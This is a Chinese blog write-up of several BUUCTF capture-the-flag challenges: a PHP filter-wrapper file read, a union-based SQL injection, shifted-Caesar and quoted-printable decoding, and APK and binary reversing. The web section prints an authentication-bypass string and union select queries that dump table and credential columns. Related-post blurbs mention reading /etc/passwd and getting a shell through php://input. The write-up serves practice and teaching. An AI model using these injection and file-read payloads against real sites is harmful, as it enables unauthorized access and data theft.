BUUCTF-伪协议-jadx

已于 2023-04-09 20:59:20 修改
阅读量160 收藏
点赞数
分类专栏: BUUctf 文章标签: php 前端 html
于 2023-04-01 21:14:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/129901100
版权

第五周 4.1

目录

WEB

[极客大挑战 2019]Secret

[极客大挑战 2019]LoveSQL

Crypto

变异凯撒

Quoted-printable

Misc

基础破解​编辑

文件中的秘密

Reverse

helloword

WEB

[极客大挑战 2019]Secret

打开环境

 没有想法 查看源代码

发现跳转 

我们进入页面查看

 有一个点击按钮 然后我们进行点击

 说结束了 我们就进行抓包

 得到一个新的页面 我们进行访问

进入得到源代码 进行代码审计 发现flag 并且过滤了一些伪协议 

我们使用filter伪协议查看

secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

返回数值 然后进行解密

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{48aa1a90-6ce2-4b9c-8e07-1c71d8361cda}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

得到flag

[极客大挑战 2019]LoveSQL

打开环境

 我们查看什么类型的注入

输入1' 得到反馈 是字符型注入

我们进行查看万能代码

用户名 :1'or 1=1#
密码随便

 

 我们继续提交 发现flag错误 我们重新返回注入 因为得到了admin 正确的用户名 我们就可以尝试进行sql注入

admin' order by 4#

 三个字段

查看回显点

0' union select 1,2,3#

得到回显点 我们在2 3 进行sql注入

爆数据库
0' union select 1,2,database()#
爆表名
0' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#
爆字段
0' union select 1,2,group_concat(column_name)from information_schema.columns where table_name ='l0ve1ysq1'#
爆出内容
0' union select 1,2,group_concat(id,username,password)from geek.l0ve1ysq1#

 得到flag

Crypto

变异凯撒

凯撒密码 打开ASCII对比

afZ_r9VYfScOeO_UL^RWUc
=flag{}

a = 97  f=102   差5
f=102 l=108     差6
发现差 5+n个

编写脚本

a = 'afZ_r9VYfScOeO_UL^RWUc'
flag = ''
p = 0
for i in a:
    flag+=chr(ord(i)+5+p)
    p+=1
print(flag)

得到flag

flag{Caesar_variation}

Quoted-printable

新品种 我们进行搜索

得到在线解码

 我们查看这种编码原理

CTF-MISC总结

8   bit   的字符用两个16进制数值表示,然后在前面加“=”。

Misc

基础破解

告诉我们四个数字

暴力破解

ZmxhZ3s3MDM1NDMwMGE1MTAwYmE3ODA2ODgwNTY2MWI5M2E1Y30=

base64解码

文件中的秘密

下载文件到属性中

得到flag

Reverse

helloword

下载文件 是apk 安卓文件 放入jadx中

搜索flag{

得到

reverse3

下载文件查壳 没有加壳 然后放入ida32

SHIDT+F12

过滤字符串

发现有关flag的 我们进行

CTRL+X

查看使用

 

 我们看到关键的right flag的地方

 if ( !strncmp(Dest, Str2, v2) )
    sub_41132F("rigth flag!\n");

判断dest和str2是不是一样的 如果一样输出right flag 
就是用户输入flag 经过转换后 如果和str2一样
那么就是正确的flag

我们找Dest的内容

strncpy(Dest, v1, 0x28u);
  v8 = j_strlen(Dest);
  for ( j = 0; j < v8; ++j )
    Dest[j] += j;


将v1 copy给dest
循环 v8次然后将  dest[j]=dest[j]+j


就是
dest[0]=dest[0]+0
dest[1]=dest[1]+1

所以我们的flag
flag+=dest[j]-j

我们查看str2的内容 双击str2

得到比对的字符串

我们得到这些可以开始写exp了

但是前面还有语句

 v1 = (const char *)sub_4110BE((int)&Str, v0, (int)&v11);

对v1的判断 因为是把v1赋值给dest的 所以我们要看这是什么函数

我们双击进入sub_4110BE 看看做了什么

好长 我们继续看看函数是什么

 双击进这个

 发现就是base64编码 那我们就可以猜测这就是将FLAG进行base64

1.用户输入 flag

2.flag base64 加密

3.加密后 数组每一个都加1 
即 dest[j]+=j

4.进行比对 成功就输出right flag

我们进行写 exp

import base64


a = "e3nifIH9b_C@n@dH"
flag = ""
for i  in range(len(a)):
    flag+= chr(ord(a[i])-i)
# print(flag)
print(base64.b64decode(flag))

得到flag

b'{i_l0ve_you}'

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf之php协议的使用
一只菜鸟呀的博客
05-20 1170
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
【网络安全 | CTF】攻防世界 Web_php_include【php协议|data协议|file协议
等风来
05-22 9504
是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
CTF 文件包含与协议
weixin_30810583的博客
11-06 864
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和协议。 先放出原文链接(http://www.freebuf.com/column/150028.html) 题目源自国外某挑战平台,平台上还有许多其他有趣的challenges题目。 站点地址:http://chall.tasteless.eu/ 这次的题目链接:http://leve...
一天一道ctf 第16天(data协议,异或sql注入)
scrawman的博客
03-29 2014
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter协议读一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
ctf文件包含+协议总结
limenzzz的博客
09-08 2288
基本原理
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
夺旗赛 CTF 六大方向基础工具简介
CSDNDi_Di的博客
03-22 2053
因果分析是数据挖掘领域重要的研究课题之一.由于传统的Granger因果模型难以准确识别多变量系统的非线性因果关系,本文提出一种基于Hilbert-Schmidt独立性准则(Hilbert-Schmidt independence criterion,HSIC)的组Lasso模型的Granger因果分析方法.首先,利用HSIC...
文件包含支持的协议
qq_50673174的博客
05-15 7739
文件包含漏洞的补充。 主要是文件包含漏洞支持的协议
【Ctfer训练计划】——(十)
Demo不是emo的博客
01-08 5421
ctf训练每日成长计划——命令执行篇
CTF-web 第八部分 常见加密与文件包含 协议
iamsongyu的博客
11-05 2103
(1)加密解密等 我们在做题的时候,经常会遇到一些奇怪的加密解密的字符串,这就需要我们能够识别一些比较常用的。        1.base64         这是一个常用的编码,而且原理也十分简单,非常容易得到原内容。 三字节变为四字节 前面补两个0。  所谓Base64,就是说选出64个字符----小写字母a-z、大写字母A-Z、数字0-9、符号"+"、"/"(再加上作为垫字的"=",实...
BUUCTF之[ZJCTF 2019]NiZhuanSiWei -------------- php和data协议,和反序列化
weixin_44632787的博客
07-17 565
BUUCTF之[ZJCTF 2019]NiZhuanSiWei 知识点: PHP协议 php://filter data:// 题目: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "&lt
CTF常用协议总结
weixin_51735061的博客
02-26 5940
PHP协议 file://协议 用来读取本地的文件,当用于文件读取函数时可以用。 常见检测是否存在漏洞写法: www.xxx.com/?file=file:///etc/passwd 此协议不受allow_url_fopen,allow_url_include配置影响 php://input协议协议一般用于输入getshell的代码。 使用方法: 在get处填上php://input如下 www.xxx.xxx/?cmd=php://input 然后用hackbar或者其他工具,pos
20210218CTF协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
CTF中常用的php协议总结
Y4tacker的博客
08-04 8106
文章目录总览file://php://php://filterphp://inputdata://参考文章 总览 php:// — 访问各个输入/输出流(I/O streams) file:// — 访问本地文件系统 phar:// — PHP 归档 zlib:// — 压缩流 data:// — 数据(RFC 2397) http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs glob:// — 查找匹配的文件路径模式 ssh2:// — Secure Shell
CTF-Web-常用协议用法:
半岛铁盒的博客
12-08 1178
常用协议用法: 1.php协议 用法 php://input,用于执行php代码,需要post请求提交数据。 php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php 需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp 不需要开启allow_url_fopen:php://filter 2.、data协议 用法: da
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php协议+序列化与反序列化)
m0_55854679的博客
08-23 1943
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值